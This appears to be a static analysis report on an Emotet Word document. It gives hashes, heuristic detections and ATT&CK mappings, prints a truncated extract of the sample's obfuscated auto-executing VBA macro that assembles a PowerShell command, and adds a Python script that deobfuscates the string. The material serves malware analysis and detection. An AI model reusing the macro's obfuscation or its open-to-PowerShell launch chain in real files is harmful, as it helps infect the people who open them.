Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 ca5fd27145d1576b…

MALICIOUS

Office (OLE)

Size: 301.5 KB
Created: 2018-07-12 07:09:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: c2f9fe27bf8ef77953b4867e0a8e3a46
SHA-1: 9597dead3e064f50d6361d1991bbaf6dc3d9525e
SHA-256: ca5fd27145d1576bc9c4da77daf29202e7f9ca7c12377ab068707d245dbfd0eb
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
T1059.005 Visual Basic

The sample is a malicious Word document carrying VBA macros. The 'OLE_VBA_SHELL' heuristic flags a Shell() call in the VBA, and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' reports that the compiled p-code pairs an auto-execution token with shell/download/object-execution tokens. The extracted source shows the auto-execution entry point: Document_open in the ThisDocument module 'JaiaQVojf' builds a string out of helper functions (WwJffLf, MdPizjV and others in module 'DDpRztH') and hands it to Application.Run("QLcNwiVpEY", ...). Each helper concatenates short string literals with undeclared variables, which are Empty and drop out of the result, and is padded with arithmetic on further undeclared names whose values are never used. WwJffLf, for example, yields 'PoWE' + 'rsh' + 'eLL', i.e. a PowerShell invocation, followed by a double quote built with Chr(34). The ClamAV signature 'Doc.Downloader.Emotet-6877387-0' attributes the document to Emotet, whose maldocs commonly use exactly this macro-to-PowerShell chain to download and execute the next stage. The body of 'QLcNwiVpEY' lies beyond the truncated extract, so the full command line and any download URL are not recoverable from the visible source.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6877387-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877387-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code contains a call to Shell(), i.e. the macro can launch an external process
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open handler runs automatically when the document is opened (subject to the macro security setting in effect)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into drawing parts, not a download location, and it does not contribute to the verdict.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  34378 bytes
SHA-256: c703ce42fb1bd5af4d545b2ea2221073e7f61f1ecffb61c8d924a8e1e93e6cc2

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "JaiaQVojf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   kOhVoc = (56231 + jEFNpq / (10751 + CKSRsw))
   RnjVa = (75958 + oCMEUs / (59501 + ahsvJz))
   LskzA = (23602 + MLcpC / (44497 + QiLQb))
   wiZiCw = (64024 + zTvqtI / (60967 + BojSrp))
jpVEOuHSRlT = Application.Run("QLcNwiVpEY", "" + fXQTYXA + bEAwHJtKQLclk + WwJffLf + MdPizjV + ioKiwd + zcjUP + ZYSfdOBo + GawHTvKq + VUlBosQW + StfwinVTi + AMuMXzRP + HbZQL + WkzjQUIP + NKQzNbTLJ)
   dRlrK = (55008 + wjIKHb / (61905 + hMiwm))
   vRckqT = (84186 + dKYus / (37498 + pGrNR))
End Sub


Attribute VB_Name = "DDpRztH"
Function WwJffLf()
On Error Resume Next
HAIPi = 81049 / TvpIv * XzhVY + PIEzw + 27452 / jjpkjh * jPQCNi / TBtPP * (XjFHY / 9226 + 71250 / wCAKAh)
VzLGsRtz = "" + LFaPpHjiIqM + LkiHaCih + "PoWE" + wvmNQsMBCnX + prhZWdQO + "rsh" + pqPctGDBwzaiT + SmvoKHjdbtQsdI + "eLL" + QYHwWAPTuwmahi + ifDrUaNjFM + "   "
cNatsD = (20242 / 12501 * (GWSWc * MVJwti - OwENbq / aqKNj * (83030 + 63361 / 47002 - idXELX)))
cqjOQB = "" + sjBLwQuAjw + icUwlQMFqkMnb + Chr(34) + " ( " + VijrpTsjJ + utTfHiwFD + "'36"
WwJffLf = "" + HaGvfiH + kVwYWCHmU + VzLGsRtz + KnXWSmKdirWXQS + ltnNbpu + cqjOQB
   vuJEa = (20041 / 70192 * (HsUDk * tUdpWN - hFzwWs / ZRVtsz * (44796 + 82943 / 2114 - DjmGJ)))
   DAQut = (96047 / 1210 * (RaNpJ * ESDrp - aKmFC / Elqbr * (47292 + 59454 / 94240 - VbmjTU)))
End Function
Function MdPizjV()
On Error Resume Next
JBrRz = (27846 / 66036 * (TDbsN * rZtPh - ipKMOj / RLWCEj * (29469 + 92917 / 2072 - nmbsdF)))
   cKzlVE = (53518 / 52363 * (ZzsJB * IVbjo - kHnpoz / wBEHLY * (74343 + 62023 / 1164 - HBVdb)))
   BHQvG = (51519 / 10071 * (lpUqiC * XRCzB - IwOqz / dFwEj * (67931 + 83939 / 25561 - aWFvwQ)))
aRfkCNHzz = "" + RZRwZVjJqr + vhHjiGVq + "q106" + OYIBUiTGIwtU + dAcjaBiudq + "f105" + uozVnDnjKto + wpjiEQb + "w9" + DiimQfDTuRdu + HnKqjqNkLDi + "9z6" + wMZZwQLk + BmIdqwXuGKKbu + "1q11"
vTVTTa = (7818 / 78696 * (EHVrh * cumzJD - MXlnJ / QBXRfz * (1506 + 92772 / 80798 - BQzzp)))
   cfNciP = zkWXGz * fRcYRh * qsjhmd - jLFino - (Ivwil * Tucdps / WzUZXs + mnhuvm)
nujJVSzRv = "" + QpTIYXVdpf + vQDsutOhrj + "0%1" + wVVODnzdDVLnWj + drkrtWrWdCAspj + "01" + iXMCCHZBjVSZ + WKiPDzwSC + "!1" + wkBmGnUoaJw + wWRiLXDR + "19" + jqJafhoLV + DWYPZhwliG + "m45z"
bShiOH = WMhWVw * NoGmzd * jtAtSl - EjmIID - (HwzZEq * LWzCT / TKirIu + rZjov)
   SjuOMs = FqHMt * WXWAqz * WuCvz - CriRK - (iCwfcl * aOOTWf / GfTCj + vNRYdz)
fNmAb = "" + WWZwiLlZstOAY + afPlHWXf + "11" + iUkYCdWs + ruazCVFbIRzWT + "1m98" + zjdqTzrojzqAAq + IoBRfFSilRwXS + "f10" + BbaEutBQ + GqzLVFk + "6V10" + oiRrSrQuFC + VUnpYZlWwH + "1f" + RZPVWQLL + adjkIMdwwOpjk + "99%" + WwfwWbhK + tcvYoqrpctK + "116w"
RZszLJ = lotLA * jMHRt * aJPki - HXwqIc - (QHOZic * AppFj / YUKihL + rfiCp)
RViOhsnSGTB = "" + lUufQMj + ndpWSlUJA + "32c7" + mNUIzcH + LkUCSOUuZSX + "8q1" + rrEWdYtK + LWRXAlioEwjGC + "01" + DEQZkibNdWdE + jrSTwJfBqUJqiS + "G116" + loujZUdkHF + nBXjHpVG + "V46%" + FzGCNvQtDJXE + JqYPNhLqZWOoz + "87f1" + pzjHwivdXHhU + aliRiWQ + "01%9" + tjaOajn + oKOLozlFONBIjN + "8w" + zkjXOFSYrqYXT + kijfEnOzlfdIDP + "67"
Wdabz = Ajirp * zYNlt * QZwht - kmvsk - (PJtdCu * tucizz / wuAMR + OjwYQo)
   qMMIw = cjaUWT * zYorwk * Cpmjas - fKVNNK - (CiQZA * jRUjp / AOKKhT + CWBad)
boNazbTKizi = "" + zVFHIJX + XRwYzkVGtcrUU + "V1"
tJHzBH = ruJmvP * jpdRT * QXfFmj - jFOic - (RNzBa * jkZBPL / FhMnOD + NYWiC)
bHVOWEOSPV = "" + ElfbJZwLhnCVk + VPtwamWSzicIs + "08%1" + zPaufnVoCP + fzMhPKhAOI + "05" + ChTjwjRFTNnmvq + AbrhSPr + "c1" + zMzLrFrBfswUp + wCCSMZlZni + "01%1" + RjcmqAszUTtcH + QzYiKiVjPNZG + "10%" + mKhqSaUC + TwtBiJZK + "116G" + VcPvpEvzMYQui + JMloVROqQONp + "59" + GnOpaqK + BNfXphrZRFUV + "m36"
WvWHlz = (bObtGl / FEwWO - kbqtYI * pvjzi) * (zstDj + vEZwD - 57544 + woUNIz)
hLcbnphmw = "" + vFcicar + cKvlKLANwSW + "z70q" + mQoM
... (truncated)
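To show concretely how the padding in the extract above collapses, here is an added Python example; it is my own illustration, not the analysis platform's code and not part of the sample. It models the two VBA rules the obfuscation relies on: an undeclared variable is Variant Empty, and the '+' operator returns its other operand unchanged when one side is Empty, so "PoWE" + junk + "rsh" is just "PoWErsh"; statements that are not pure concatenations (the numeric padding) are ignored, which matches what On Error Resume Next does for the ones that fail. A bare name that matches a Function is treated as a call. Only Document_open and WwJffLf are fed in, copied from the extract; the other helpers named in the Application.Run argument sit beyond the truncation point and therefore resolve to empty, a limitation of the page, not of the method. Nothing about the body of QLcNwiVpEY or the remainder of the command line is assumed.

```python
import re

# Lines copied from the extract above: Document_open from module JaiaQVojf and
# the helper WwJffLf from module DDpRztH. The page's extract is truncated, so
# the other helpers named in the Application.Run argument are not available
# here; they resolve to Empty exactly as an undeclared variable would.
SAMPLE_VBA = r'''
Private Sub Document_open()
On Error Resume Next
   kOhVoc = (56231 + jEFNpq / (10751 + CKSRsw))
jpVEOuHSRlT = Application.Run("QLcNwiVpEY", "" + fXQTYXA + bEAwHJtKQLclk + WwJffLf + MdPizjV + ioKiwd + zcjUP + ZYSfdOBo + GawHTvKq + VUlBosQW + StfwinVTi + AMuMXzRP + HbZQL + WkzjQUIP + NKQzNbTLJ)
End Sub

Function WwJffLf()
On Error Resume Next
HAIPi = 81049 / TvpIv * XzhVY + PIEzw + 27452 / jjpkjh * jPQCNi / TBtPP * (XjFHY / 9226 + 71250 / wCAKAh)
VzLGsRtz = "" + LFaPpHjiIqM + LkiHaCih + "PoWE" + wvmNQsMBCnX + prhZWdQO + "rsh" + pqPctGDBwzaiT + SmvoKHjdbtQsdI + "eLL" + QYHwWAPTuwmahi + ifDrUaNjFM + "   "
cNatsD = (20242 / 12501 * (GWSWc * MVJwti - OwENbq / aqKNj * (83030 + 63361 / 47002 - idXELX)))
cqjOQB = "" + sjBLwQuAjw + icUwlQMFqkMnb + Chr(34) + " ( " + VijrpTsjJ + utTfHiwFD + "'36"
WwJffLf = "" + HaGvfiH + kVwYWCHmU + VzLGsRtz + KnXWSmKdirWXQS + ltnNbpu + cqjOQB
End Function
'''

PROC_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?(?:Function|Sub)\s+(\w+)\s*\(\)\s*$'
    r'(.*?)^\s*End\s+(?:Function|Sub)\s*$', re.S | re.M | re.I)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
RUN_RE = re.compile(r'^Application\.Run\("([^"]*)"\s*,\s*(.*)\)\s*$', re.I)
# string literal | Chr(n) | identifier | '+' | any other non-space character
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)|([A-Za-z_]\w*)|(\+)|(\S)', re.I)


def parse_procedures(src):
    """Map each Sub/Function name to its list of (target, rhs) assignments."""
    procs = {}
    for name, body in PROC_RE.findall(src):
        procs[name] = [m.groups() for m in map(ASSIGN_RE.match, body.splitlines()) if m]
    return procs


def eval_concat(rhs, lookup):
    """Evaluate a flat VBA '+' chain of string literals, Chr(n) and names.

    VBA's '+' returns its other operand unchanged when one side is Empty, so
    the junk identifiers simply vanish. Anything that is not a pure
    concatenation (the numeric padding, whose results the string builders
    never read) yields None and is left alone; under On Error Resume Next a
    failing statement of that kind is skipped the same way."""
    parts = []
    for m in TOKEN_RE.finditer(rhs):
        lit, code, ident, _plus, other = m.groups()
        if other:
            return None
        if lit is not None:
            parts.append(lit.replace('""', '"'))   # VBA escapes " by doubling it
        elif code is not None:
            parts.append(chr(int(code)))
        elif ident is not None:
            parts.append(lookup(ident))
    return "".join(parts)


def emulate(src):
    """Run every procedure; return ({name: return value}, [(macro, argument)])."""
    procs = parse_procedures(src)
    results, runs = {}, []

    def run(name):
        if name in results:
            return results[name]
        results[name] = ""                         # recursion guard
        local = {}

        def lookup(ident):
            if ident in local:
                return local[ident]
            if ident in procs:                     # bare name of a Function = call
                return run(ident)
            return ""                              # undeclared variable: Empty

        for target, rhs in procs[name]:
            call = RUN_RE.match(rhs)
            if call:                               # record what reaches Application.Run
                runs.append((call.group(1), eval_concat(call.group(2), lookup)))
                continue                           # Run's own return value is not modelled
            value = eval_concat(rhs, lookup)
            if value is not None:
                local[target] = value
        results[name] = local.get(name, "")        # 'FuncName = ...' sets the return value
        return results[name]

    for name in procs:
        run(name)
    return results, runs


if __name__ == "__main__":
    values, calls = emulate(SAMPLE_VBA)
    for macro, arg in calls:
        print(f"Application.Run({macro!r}, {arg!r})")
```

On the two procedures available here this recovers `PoWErsheLL   " ( '36` as the value handed to Application.Run("QLcNwiVpEY", ...): the start of a PowerShell command line whose argument is opened with a double quote. With the full, untruncated macros.bas every helper in the concatenation would contribute its fragment and the argument would be the complete command, which is the string an analyst wants to pull out before it ever reaches Shell().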